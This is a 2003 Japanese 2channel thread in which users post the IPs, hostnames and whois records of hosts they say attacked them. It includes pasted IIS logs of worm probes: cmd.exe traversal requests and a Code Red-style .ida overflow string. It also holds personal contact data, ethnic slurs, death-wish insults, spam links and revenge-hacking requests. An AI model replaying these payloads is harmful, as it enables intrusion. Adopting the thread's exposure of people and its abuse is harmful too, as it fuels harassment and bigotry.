sage進行でおながいします(E-mail欄に半角でsageと入れる)。

IP晒すなら、踏み台遡って攻撃元まで晒すようおながいします。
踏み台か攻撃元か判別できない方、どうやれば遡れるのか分からない方は
書き込まないことを推奨します。
219.104.204.80
oyma.102080.catv.ppp.infoweb.ne.jp
真性ですな
ノートンさんのファイアウォールでひっかかったやつだが、報告はこれでいいか?
http://www.networksolutions.com/cgi-bin/whois/whois?STRING=comcast.net&SearchType=do

68.33.231.92
pcp03599043pcs.whtmrs01.md.comcast.net

CustName: Comcast Cable Communications, Inc.
Address: 3 Executive Campus
Address: 5th Floor
City: Cherry Hill
StateProv: NJ
PostalCode: 08002
Country: US
RegDate: 2003-03-19
Updated: 2003-03-19
453名無しさん@お腹いっぱい。:03/07/02 00:04
IPからどうやって地域を特定するのでしょうか?
最近、しかも早朝に攻撃されてむかついています
>>451-453
氏ね
455名無しさん@お腹いっぱい。:03/07/02 01:23
>>454
お前がな
ここに晒すこと自体意味あるのかね?
代わりに仕返ししてくれるとかじゃないだろ
457:03/07/02 15:24
某掲示板のスレでありもしないコトでたたかれました。
おかげで信用はなくすし・・・、掲示板のカキコからIPをぬくコトはできなぃのでしょうか?
どぅしても、カキコした人を捕まえたいんです。
情報ください。お願いします。
458あぼーん:あぼーん
あぼーん
459 :03/07/02 15:32
460:03/07/02 15:40
ぇっと・・・、繭は風俗情報を知りたぃわけじゃなぃんですが。
461名無しさん@お腹いっぱい。:03/07/02 18:59
ノートンで・・・・
KOKUSAI KOUGYOU KANDA BLDG 6F
>>457
氏ね
463:03/07/02 20:45
464 :03/07/03 00:06
hompy.comってなんだ?
個人情報を取ってる感じ。
マカフィーが反応しています。

みなさんも、気をつけて!
>>464
師ね
466あぼーん:あぼーん
あぼーん
(・∀・)コレイイ
http://members.goo.ne.jp/home/assassin502/
>>466厨房キターw
468(;´Д`):03/07/03 21:25
http://www.k-514.com/
ボッキンキン
469名無しさん@お腹いっぱい。:03/07/03 21:25
>>460
エロチカギャル尾めっv(^_-)ミ★
2003/07/03 22:10:24, HTTP port probe, 220.73.165.11, 53
こいつウザイ今アタックしまくってる、もう70回超えてる、たのむからちゃんとしろよボケ
471名無しさん@お腹いっぱい。:03/07/03 22:40
昨日に引き続き
お隣、韓国ソウルからのアタック

inetnum: 218.237.232.0 - 218.237.232.255
netname: HANANET-CATV-ANYANGSO-KR
descr:   HANARO Telecom
descr:   1445-3 Seocho-Dong Seocho-Ku
descr:   SEOUL
descr:   137-728
country: KR
>>470-471
師ね
473名無しさん@お腹いっぱい。:03/07/04 00:20
>>472
あなたは見知らぬ闇討ちされた事されたありますか?
驚きませんか探知されてるのですよ
それを進とはなんですね
>>473
能書きはいいから、死ね。
475名無しさん@お腹いっぱい。:03/07/04 01:03
はぁ?
人間的心をもっていない2chに頼りきりの弱小脆弱日本人がないいってんですか
476名無しさん@お腹いっぱい。:03/07/04 01:04
おこっちゃまし!
し!
477名無しさん@お腹いっぱい。:03/07/04 01:04
ふー!
478名無しさん@お腹いっぱい。:03/07/04 01:04
2chはCoReAに統合されます
感謝してください
479名無しさん@お腹いっぱい。:03/07/04 01:05
あ¥s 
480名無しさん@お腹いっぱい。:03/07/04 01:05
?夬????, ?
481名無しさん@お腹いっぱい。:03/07/04 01:14
>>475日本人がないいってんですか
「ないいってんですか 」はチョソ同士では通じるかも知れませんが、
日本語を練習してから書き込んで下さい。
482名無しさん@お腹いっぱい:03/07/04 01:18
ここの厨房にむかついてます。

http://island.gaiax.com/home/tuyosi/main

アホか?ってな感じです。
483名無しさん@お腹いっぱい。:03/07/04 01:19
>481
それはあなただーo(-_^)v(ぷっ
484名無しさん@お腹いっぱい。:03/07/04 06:48
>>482
凄いアホをみてしまった。素で焦った。
こんなあほな中学生がいたとは・・・・
485あぼーん:あぼーん
あぼーん
>>485
師ね 
487 :03/07/06 02:10
220.104.110.164
p8164-ipad29hodogaya.kanagawa.ocn.ne.jp
488名無しさん@お腹いっぱい。:03/07/06 02:22
( ´_ゝ`)フーン
日本の植民地だった国の人が、しゃしゃり出て来るスレはココですか。
そんなに、日本人とお話したかったら、おとなしく併合されとけば良かったのにね〜。
>>487
死ね
490名無しさん@お腹いっぱい:03/07/06 13:48
IIS4 で自鯖してるんだけど、NETSTATで見ていたら
TCP 192.168.1.8:1794 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1795 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1842 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1843 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1845 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1846 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1847 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1849 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1850 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1855 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1856 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1859 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1861 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1864 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1865 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1866 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1870 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1873 207.46.82.78:80 TIME_WAIT
TCP 192.168.1.8:1876 207.46.82.78:80 TIME_WAIT

こんなのが見えるんだけれど ?
>>490
師ね
492虎戦士 ◇emTcuD3vvI:03/07/06 20:08
>>491
調子乗ってると、おまえの住所調べ上げんぞ。
それなりのソフトもあるしな。うひょげら
クスクス
本物のトリップを出してからどうぞ。
219.106.13.77
新潟三洋電子
踏み台なのか?そうなのか?どうなんだYO!
>>495
死ね
497名無しさん@お腹いっぱい。:03/07/07 23:48
ここいつも攻撃して来るんだけど。
Yahooの職員がハッキングしてるって噂がある。
inetname: 2190.0.0.-219.63.255.255
netname:BBTECH
descr:SOFTBANK BB CORP
descr:Nation wide network in Japan
country:JP
admin-c:SA127-AP
tech-c:SA12-AP
mnt-by:APNIC-HM
mnt-lower:MAINT-JP-BBTECH
changed: [email protected] 20011031
changed:[email protected] 20030616
status: ALLCATED PORTABLE
source:APNIC
>>497
もういいって
寝ていいよ
sage進行でおながいします(E-mail欄に半角でsageと入れる)。

IP晒すなら、踏み台遡って攻撃元まで晒すようおながいします。
踏み台か攻撃元か判別できない方、どうやれば遡れるのか分からない方は
書き込まないことを推奨します。
500 :03/07/08 00:35
inetnum: 219.138.0.0 - 219.140.255.255
netname: CHINANET-HB
descr: CHINANET hubei province network
descr: China Telecom
descr: A12,Xin-Jie-Kou-Wai Street
descr: Beijing 100088
country: CN
admin-c: CH93-AP
tech-c: CHA1-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CN-CHINANET-HB
changed: [email protected] 20020521
status: ALLOCATED NON-PORTABLE
source: APNIC

中国人はっかー??
sage進行でおながいします(E-mail欄に半角でsageと入れる)。

IP晒すなら、踏み台遡って攻撃元まで晒すようおながいします。
踏み台か攻撃元か判別できない方、どうやれば遡れるのか分からない方は
書き込まないことを推奨します。
502名無しさん@お腹いっぱい。:03/07/08 02:02
% [whois.apnic.net node-1]
% How to use this server http://www.apnic.net/db/
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html

inetnum: 210.13.0.0 - 210.13.31.255
netname: JITONG-CN
descr: Ji Tong Communications Co.,Ltd, Beijing Branch
country: CN
admin-c: QZ30-AP
tech-c: QZ30-AP
mnt-by: MAINT-CHINAGBN-AP
changed: [email protected] 20010626
status: ALLOCATED PORTABLE
source: APNIC

person: Qing Zhourong
address: Room 201,Buiding 4,No.27 Wanshou Road, Beijing
address: BEIJING, CHINA
country: CN
phone: +86-010-64262954
fax-no: +86-010-64251441
e-mail: [email protected]
nic-hdl: QZ30-AP
mnt-by: MAINT-CHINAGBN-AP
changed: [email protected] 20010626
source: APNIC
503名無しさん@お腹いっぱい。:03/07/08 15:15
>501
>IP晒すなら、踏み台遡って攻撃元まで晒すようおながいします。
>踏み台か攻撃元か判別できない方、どうやれば遡れるのか分からない方

うざい、何回も同じ事繰り返し書くな
前向きに話を進めたいなら、判別の仕方教えれ

じゃなきゃ、おまえ自身が荒らしと変わらんぞ
504名無しさん@お腹いっぱい。:03/07/08 15:48
>>503
>IP晒すなら、踏み台遡って攻撃元まで晒すようおながいします
>>502
死ね
>>500
師ね 
508アメリカ在住:03/07/09 03:21
アメリカの色んな出合い系に出没する有名なアメリカ人がいるらしいんだけど
どうも英語が下手で、アメリカ人では気がするんだよ。
試しにメール書いてみたら、IPがアメリカなんだが
別なサイトでそいつに遭遇した時は、イタリアになってたりドイツになってたり
するんだよ。どういうことだ?
訂正 アメリカ人では無い気がするんだよ
510_:03/07/09 03:29
511名無しさん@お腹いっぱい。:03/07/09 03:40
2003/07/08(22:17:26) W-SV 218.75.150.179 [80] 404 242 "GET /scripts/root.exe?/c+dir HTTP/1.0"
2003/07/08(22:17:27) W-SV 218.75.150.179 [80] 404 240 "GET /msadc/root.exe?/c+dir HTTP/1.0"
2003/07/08(22:17:28) W-SV 218.75.150.179 [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/07/08(22:27:35) W-SV 218.43.3.181 [80] 404 242 "GET /scripts/root.exe?/c+dir HTTP/1.0"
2003/07/08(22:27:35) W-SV 218.43.3.181 [80] 404 240 "GET /msadc/root.exe?/c+dir HTTP/1.0"
2003/07/08(22:27:35) W-SV 218.43.3.181 [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/07/08(22:27:36) W-SV 218.43.3.181 [80] 404 250 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/07/08(22:27:36) W-SV 218.43.3.181 [80] E200035 ".. が含まれるリクエストは許可されていません。 [ 218.43.3.181 "/scripts/..\../winnt/system32/cmd.exe" ]"
2003/07/08(22:27:36) W-SV 218.43.3.181 [80] 403 262 "GET /scripts/..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/07/08(22:27:36) W-SV 218.43.3.181 [80] E200035 ".. が含まれるリクエストは許可されていません。 [ 218.43.3.181 "/_vti_bin/..\../..\../..\../winnt/system32/cmd.exe" ]"
2003/07/08(22:27:36) W-SV 218.43.3.181 [80] 403 275 "GET /_vti_bin/..\../..\../..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/07/08(22:27:37) W-SV 218.43.3.181 [80] E200035 ".. が含まれるリクエストは許可されていません。 [ 218.43.3.181 "/_mem_bin/..\../..\../..\../winnt/system32/cmd.exe" ]"
2003/07/08(22:27:37) W-SV 218.43.3.181 [80] 403 275 "GET /_mem_bin/..\../..\../..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/07/08(22:27:37) W-SV 218.43.3.181 [80] E200035 ".. が含まれるリクエストは許可されていません。 [ 218.43.3.181 "/msadc/..\../..\../..\/..\../..\../..\../winnt/system32/cmd.exe" ]"
2003/07/08(22:27:37) W-SV 218.43.3.181 [80] 403 288 "GET /msadc/..\../..\../..\/..\../..\../..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
512名無しさん@お腹いっぱい。:03/07/09 04:51
inetnum: 213.200.120.0 - 213.200.127.255
netname: NACNET-EU
descr: Tiscali International Network B.V.
descr: Robert-Bosch-Str. 32
descr: D-63303 Dreieich
country: DE
admin-c: SE33-RIPE
tech-c: TIS333-RIPE
status: ASSIGNED PA
notify: [email protected]
mnt-by: TISCALI-INT-NET
changed: [email protected] 20020429
changed: [email protected] 20020930
source: RIPE
513名無しさん@お腹いっぱい。:03/07/09 05:23
inetnum: 217.159.2.0 - 217.159.15.255
netname: Satlynx_Sat_Net_1
descr: Satlynx Satellite Link 1a
descr: Illerstr. 15
descr: D-71522 Backnang
descr: Germany
country: DE
admin-c: HB13461-RIPE
tech-c: RW552-RIPE
tech-c: HZI1-RIPE
status: ASSIGNED PA
mnt-by: GILAT-MNT
changed: [email protected] 20030318
source: RIPE
514名無しさん@お腹いっぱい。:03/07/09 05:25
2003/07/09(05:22:46) W-SV 218.57.136.99 [80] 403 262 "GET /scripts/..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/07/09(05:22:47) W-SV 218.57.136.99 [80] 404 225 "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/07/09(05:22:48) W-SV 218.57.136.99 [80] 404 225 "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/07/09(05:22:56) W-SV 218.57.136.99 [80] E200035 ".. が含まれるリクエストは許可されていません。 [ 218.57.136.99 "/scripts/..\../winnt/system32/cmd.exe" ]"
2003/07/09(05:22:56) W-SV 218.57.136.99 [80] 403 262 "GET /scripts/..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/07/09(05:23:02) W-SV 218.57.136.99 [80] E200035 ".. が含まれるリクエストは許可されていません。 [ 218.57.136.99 "/scripts/../../winnt/system32/cmd.exe" ]"
2003/07/09(05:23:02) W-SV 218.57.136.99 [80] 403 262 "GET /scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
515名無しさん@お腹いっぱい。:03/07/09 06:03
inetnum: 213.200.120.0 - 213.200.127.255
netname: NACNET-EU
descr: Tiscali International Network B.V.
descr: Robert-Bosch-Str. 32
descr: D-63303 Dreieich
country: DE
admin-c: SE33-RIPE
tech-c: TIS333-RIPE
status: ASSIGNED PA
notify: [email protected]
mnt-by: TISCALI-INT-NET
changed: [email protected] 20020429
changed: [email protected] 20020930
source: RIPE
517虎戦士 ◇emTcuD3vvI:03/07/09 18:23
>>516
調子乗ってると、おまえの住所調べ上げんぞ。
それなりのソフトもあるしな。うひょげら
ぷゲラぷぷぷ
ペット〜キライ〜
520_:03/07/10 01:26
↑糞アダルトリンク
522虎戦士 ◇emTcuD3vvI:03/07/10 02:27
>>520
調子乗ってると、おまえの住所調べ上げんぞ。
それなりのソフトもあるしな。うひょげら
523名無しさん@お腹いっぱい。:03/07/10 04:00
お前らそんなに知識あるならお願いがある。
北朝鮮の糞どもにギャフンと言わせたい!!
どうしたらいい?
ヒントでもいいから教えてください
とりあえずはハードディスクをめちゃめちゃにしたいっす
>>523
プッ
525名無しさん@お腹いっぱい。:03/07/10 04:42
2003/07/10(04:02:18) W-SV 218.27.77.40 [80] 404 237 "GET /default.ida?
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0"
526名無しさん@お腹いっぱい。:03/07/10 18:07

9 40 ms 40 ms 50 ms 62.216.128.245
10 40 ms 50 ms 50 ms 62.216.144.246
11 40 ms 50 ms 50 ms adsl029101.usr.hananet.net [210.94.29.101]
12 50 ms * * 218.39.19.34
13 51 ms 50 ms 50 ms 211.117.1.162
14 50 ms 60 ms 60 ms 218.236.67.46
15 50 ms 50 ms 50 ms 218.39.28.150
16 50 ms 50 ms 51 ms 219.250.35.211
この韓国人のバカは死ね
527_:03/07/10 18:14
>526
師ね
529名無しさん@お腹いっぱい。:03/07/10 21:58
220.96.209.78=p8078-ipadfx01awa.osaka.ocn.ne.jp
CSK-中部相互警備保障株式会社 [We are protect your wealth]
会社のPC(IIS)を使ってHP運営してるのはいいけど
自分の会社のHPも警備しろよ。

ワームに感染してるよ

2003/07/10(21:19:37) W-SV 220.96.209.78 [80] 404 237 "GET /default.ida?
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd
3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0"


530名無しさん@お腹いっぱい。:03/07/11 12:11
2003/07/11(11:32:14) W-SV 61.195.3.44 [80] 403 262 "GET /scripts/..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/07/11(11:32:14) W-SV 61.195.3.44 [80] E200035 ".. が含まれるリクエストは許可されていません。 [ 61.195.3.44 "/scripts/../../winnt/system32/cmd.exe" ]"
2003/07/11(11:32:14) W-SV 61.195.3.44 [80] 403 262 "GET /scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
531pino:03/07/11 12:46
>>552
そんなことくちだけじゃなくて実際にやって
みてくださいよ・・・・どうせむりなんでしょ?????
532ななしさん:03/07/11 15:09
画像欲しさにアクセスしてきたホスト公開
こいつらみんな画像ほしいんだな。

http://www.sphera-jp.com/secret.log
sage進行でおながいします(E-mail欄に半角でsageと入れる)。

IP晒すなら、踏み台遡って攻撃元まで晒すようおながいします。
踏み台か攻撃元か判別できない方、どうやれば遡れるのか分からない方は
書き込まないことを推奨します。
fltky2-p199.hi-ho.ne.jp(219.126.169.200)
IPアドレス
172.197.176.124
ホスト名
ACC5B07C.ipt.aol.com
IPアドレス
 割当国 
アメリカ合衆国 (US)
Name: 218-228-205-242.eonet.ne.jp
Address: 218.228.205.242
2003/07/12 15:04:09Treadrop attack
Name: o079126.ap.plala.or.jp
Address: 219.167.79.126
2003/07/12 17:15:06Neastea attack
538_:03/07/13 02:04
>>533
>IP晒すなら、踏み台遡って攻撃元まで晒すようおながいします。
踏み台も悪.晒せ
IPアドレス
24.57.18.211
ホスト名
d57-18-211.home.cgocable.net
IPアドレス
 割当国 ※
カナダ (CA)
IPアドレス所有者情報
Cogeco Cable Inc. CGOC-3BLK (NET-24-57-0-0-1)
24.57.0.0 - 24.57.255.255
Cogeco Cable Solutions CGOC-WIDO2-1 (NET-24-57-16-0-1)
24.57.16.0 - 24.57.31.255
218.13.37.133
220.4.96.91
202.98.123.49
63.57.19.42
202.19.129.136
211.83.248.26
61.217.124.221
202.130.83.98
211.5.36.132
67.202.109.204
66.199.149.229
202.97.143.205
217.59.156.35:3679
YahooBB220044017017.bbtec.net
211.99.96.200
202.109.129.136
545age殿:03/07/14 15:04
拒否された電子メール アドレス : **************
件名 '', アカウント : 'es-maili.esnet.ed.jp',
サーバー : 'es-maili.esnet.ed.jp',
プロトコル : SMTP, サーバーの応答 : '553 5.3.0 <*********>...
This Server es-maili is not supported Internet Mail Service..', ポ
ート : 25, セキュリティ (SSL) : なし

IPアドレス 192.168.1.8
サブネットマスク 255.255.255.0
デフォルトゲートウェイ 192.168.1.100

DNSサーバー 10.20.33.18
sage進行でおながいします(E-mail欄に半角でsageと入れる)。

IP晒すなら、踏み台遡って攻撃元まで晒すようおながいします。
踏み台か攻撃元か判別できない方、どうやれば遡れるのか分からない方は
書き込まないことを推奨します。
というか踏み台を晒してくれているお陰でわざわざスキャンしなくて済みます。
ありがとう、初心者。
548名無しさん@お腹いっぱい。:03/07/14 18:07
このスレってやっぱ問題じゃね?
困る人とかいるんじゃねーの?
>>548
死にな
>>548
踏み台探す時間が省けて助かってるけど。
>>550
氏ね、捕まれ
552初心者:03/07/14 21:39
初めまして初心者だすよ
女にいじめを受けているので復讐として
奴らにハッキングする方法思いついた
誰か知っている人はみまそんか?????
>>552
この板は、LANや個人のPCへの侵入、トロイ、ウィルス等、
様々なネット上の危険からの防御法や対策を語りあうための板です。
掲示板の荒らし方や侵入の方法、メールボムの送り方等、
攻撃方法の質問はご遠慮下さい。
2ちゃんねるでは荒らし依頼は出来ません。
また、この板ではアタック依頼は受け付けません。
攻撃依頼を見かけた方は、放置してください。
ネット犯罪の被害者になってしまった方は、まず警察にご相談下さい。
>>552
ファッキング?
555名無しさん@お腹いっぱい。:03/07/15 01:08
265.289,.29.893
556山崎 渉:03/07/15 11:05

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄
66.28.187.245
558名無しさん@お腹いっぱい。:03/07/16 05:47

218.70.245.64
560 ◆E8yPg.mGTk :03/07/17 02:03


#218.70.245.64
561名無しさん@お腹いっぱい。:03/07/17 02:30
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.124.0.0-61.124.255.0
b. [ネットワーク名] INFOWEB
f. [組織名] InfoWeb(富士通株式会社)
g. [Organization] InfoWeb(Fujitsu Ltd.)
m. [運用責任者] KH071JP
n. [技術連絡担当者] AI018JP
p. [ネームサーバ] ns1.hyper.web.ad.jp
p. [ネームサーバ] ns2.hyper.web.ad.jp
y. [通知アドレス] [email protected]
[割当年月日] 2001/01/31
[返却年月日]
[最終更新] 2001/02/02 10:39:04 (JST)
[email protected]
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 218.43.128.0-218.43.191.0
b. [ネットワーク名] OCN
f. [組織名] オープンコンピュータネットワーク
g. [Organization] Open Computer Network
m. [運用責任者] AY1361JP
n. [技術連絡担当者] MO081JP
n. [技術連絡担当者] KK551JP
n. [技術連絡担当者] IM657JP
p. [ネームサーバ] ns-kg001.ocn.ad.jp
p. [ネームサーバ] ns-kn001.ocn.ad.jp
y. [通知アドレス] [email protected]
[割当年月日] 2001/11/27
[返却年月日]
[最終更新] 2001/12/25 19:39:40 (JST)
[email protected]

ウザイぞ福岡人
200.80.33.36
ぞぬ入れてる香具師いる?
>>564
ホットゾヌ入れてる
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 203.141.32.0-203.141.47.0
b. [ネットワーク名] YAHOO-NET
f. [組織名] ヤフー株式会社
g. [Organization] Yahoo Japan Corp.
m. [運用責任者] IT018JP
n. [技術連絡担当者] IT018JP
p. [ネームサーバ] dnsg01.yahoo.co.jp
p. [ネームサーバ] dnsn201.yahoo.co.jp
y. [通知アドレス] [email protected]
[割当年月日] 2003/02/07
[最終更新] 2003/03/06 17:17:41 (JST)
[email protected]

もうね、2、3日で255回もしかけてくんなと。
総当りすンなと。
お腹いぱーいだYo!
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 219.116.0.0-219.116.255.0
b. [ネットワーク名] INFOWEB
f. [組織名] InfoWeb(富士通株式会社)
g. [Organization] InfoWeb(Fujitsu Ltd.)
m. [運用責任者] KH071JP
n. [技術連絡担当者] KN6902JP
n. [技術連絡担当者] TK13654JP
p. [ネームサーバ] ns1.hyper.web.ad.jp
p. [ネームサーバ] ns2.hyper.web.ad.jp
y. [通知アドレス] [email protected]
[割当年月日] 2002/10/16
[最終更新] 2003/04/16 14:08:58 (JST)
[email protected]
219.129.50.6sql
142.154.193.103sql
64.237.33.10sql
219.133.46.200sql

支那人ウザイ
569名無しさん@編集中:03/07/19 14:48
219.111.85.231
231.85.111.219.dy.bbexcite.jp
>>569
いい加減にしてよ
571 :03/07/19 15:15
>>570
何がだ
>>571
ageるの
65.35.169.116 6535169hfc116.tampabay.rr.com

61.40.220.235
>>573
死ね
>>574
おまえが死ね!
576x:03/07/19 16:09
★クリックで救えるオマ○コがあるらしい★
http://yahooo.s2.x-beat.com/linkvp/linkvp.html
>>575
師ね 
>>575
氏ね
>>574は過去に晒されたお馬鹿ちゃん
>>579はログのほとんどがゴミバケツであることを理解していない
>>579
( ´,_ゝ`)プッ
そんなもんありません
200.102.24.152 - - [20/Jul/2003:10:18:03 +0000] "GET /phpwebsite/setup/ HTTP/1.0
" 302 278 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
200.102.24.152 - - [20/Jul/2003:10:18:05 +0000] "GET /setup/ HTTP/1.0" 302 278 "
-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
213.114.161.203 ←こいつしつこいseドメイン
66.143.58.33
220.210.235.138
210.63.140.123
65.169.6.4
584名無しさん@お腹いっぱい。:03/07/21 03:09
attaker への対処例をみつけました。
こんなので解決できるのかな?

ttp://ohmoriws1.ms.kagu.tus.ac.jp/lab_master/tawai_contents/attacker.html
attaker -> attacker
sage進行でおながいします(E-mail欄に半角でsageと入れる)。

IP晒すなら、踏み台遡って攻撃元まで晒すようおながいします。
踏み台か攻撃元か判別できない方、どうやれば遡れるのか分からない方は
書き込まないことを推奨します。
587名無しさん@お腹いっぱい。:03/07/21 03:19
ハッカー逮捕!!犯人は2ちゃんねらー!!
【進入】大手芸能プロダクションHP改ざんの疑い【ウィルス】
http://human2.2ch.net/test/read.cgi/owarai/1058692852/l50


キターーーなんかいっぱいくましたぁ!!!
news.redcentre.net
news.redcentre.net
saftdwin.demon.co.uk
200-207-88-30.dsl.telesp.net.br
221.red-80-33-36.pooles.rima-tde.net
dragon.dmf.go.th
589 :03/07/21 17:30
218.123.72.69:3042
590”ヘ( ̄- ̄ ):03/07/21 17:54
http://homepage3.nifty.com/coco-nut/
  _、_
( ,_ノ` )y━・~~~ 見たらどうだ・・・
591名無しさん@お腹いっぱい。:03/07/21 18:08
広告よけアゲ
592名無しさん@お腹いっぱい。:03/07/21 18:11
age
>>1よ、お前みたいな奴をみると、あの日のことを思い出すよ。
2001年11月28日。MXユーザーが逮捕された日だよ。
MXユーザーが逮捕されて、祭になってさ、
その日のうちに糞スレが乱立されてた日だよ。
あのときのダウソ板の住人、カッコよかったんだぜ。「総力を結集」ってのはまさにああいう状態だよ。
糞スレを3倍にしないと逮捕、ってもんだから、糞スレ立てまくってさ、
そしたらほんの何時間かで完成したんだよ。それが聞いてくれよ、目標は3倍だったのに
16倍まで乱立に成功しやがったんだよ。職人技なんてもんじゃねえよ、神技だよ。
でもよ、そうやって頑張る人がいた一方で、「もうだめぽ」とか駄レスしたバカも
いたわけだよ。ちょうど、今のお前みたいにな。
だからよ、俺たちは総力を結集して、お前のバカ度を16倍にしようと思うよ。
ま、倍増後でもお前のバカ度はこの世に生かしておくことのできないレベルだけどな。
要するに俺らの力を結集してもお前を助けることができないってことだ。
わかったら、まわりに迷惑をかけないようにひっそりと死んでくれよな
cr4-201-241.seaple.ne.jp

Domain Information: [ドメイン情報]
a. [ドメイン名] SEAPLE.NE.JP
b. [ねっとわーくさーびすめい] しーぷるねっとならしの
c. [ネットワークサービス名] しーぷるねっと習志野
d. [Network Service Name] seaplenet-narashino
k. [組織種別] ネットワークサービス
l. [Organization Type] Network Service
m. [登録担当者] MS6180JP
n. [技術連絡担当者] KH5470JP
p. [ネームサーバ] ns1.jcnet.ad.jp
p. [ネームサーバ]

p. [ネームサーバ] ns2.jcnet.ad.jp
y. [通知アドレス] [email protected]
[状態] Connected (2004/06/30)
[登録年月日] 2002/06/18
[接続年月日] 2002/07/12
[最終更新] 2003/07/01 02:18:07 (JST)
[email protected]

219.112.201.241
595 :03/07/22 21:00

IPアドレス 218.123.72.69
ホスト名 YahooBB218123072069.bbtec.net

あー、うぜー。
好きにしたって。
220.77.210.171
210.94.186.96
210.94.160.0
210.94.191.255
61.144.0.0
61.144.255.255
61.16.111.96
61.16.111.127
61.16.111.126
80.116.249.129
24.209.220.192
61.84.180.184
61.92.50.133
64.47.205.252
64.123.137.30
68.114.152.134
599 :03/07/24 18:02
usen-219x120x221x79.ap-US.usen.ad.jp
p2118-ip02souka.saitama.ocn.ne.jp
600_:03/07/24 18:11
601名無しさん@お腹いっぱい。:03/07/24 19:02
ddb715a09.oct-net.ne.jp
94.27.244.43.ap.livedoor.jp

こいつら、無差別攻撃してるらしいぞ。
602_:03/07/24 19:28
>>601
いい加減にしてください
604_:03/07/24 19:45
605名無しさん@お腹いっぱい。:03/07/24 21:34
>>605
分かったから、ネットwatch板でやれよ
あそこならお前みたいなやつが一杯いるからよ
仲良くやって来い
607 :03/07/25 13:14
IPアドレス 213.122.197.72
ホスト名 host213-122-197-72.in-addr.btopenworld.com
608初心物:03/07/25 13:16
http://www.adultshoping.com/addclickport.cgi?pid=1058922748
●無料でパソコンだけで月に10万円↑稼げます!
登録完全無料!お小遣いが沢山稼げちゃいます。
月に平均10万円ほど稼げます。頑張ればもっと!
夏休みを有効に利用しましょう!
無料だから登録しないと損します〜。
>>607
いい加減にしてください
610???:03/07/25 13:30
61161-21-171-105.home.ne.jp:03/07/25 14:00
h
612_:03/07/25 14:47
613名無しさん@お腹いっぱい。:03/07/25 16:52
広告よけage
614名無しさん@お腹いっぱい。:03/07/27 03:09
TearDrop攻撃された - Source:219.126.138.223
>>614
TeaDropの意味が分かってないに1000ペリカ
220.77.210.171←しつこすぎる
213.227.19.162
617名無しさん@お腹いっぱい。:03/07/27 19:21
192.168.0.1←こいつしつこい!氏ね!
ハア〜?
>>617
糞暑い夏にあなたのつまらない洒落で冷えました。
ありがとうございます。

192.168.0.1なら、ネットに繋がなくても存在しますね。
207.89.211.194
621名無しさん@お腹いっぱい。:03/07/27 23:18
620.617.614.607 <-死ね
622あぼーん:あぼーん
あぼーん
81.213.0.73
212.235.117.229
133.205.228.244
66.117.30.76
172.172.76.187
64.236.237.57
209.86.207.181
195.146.99.180
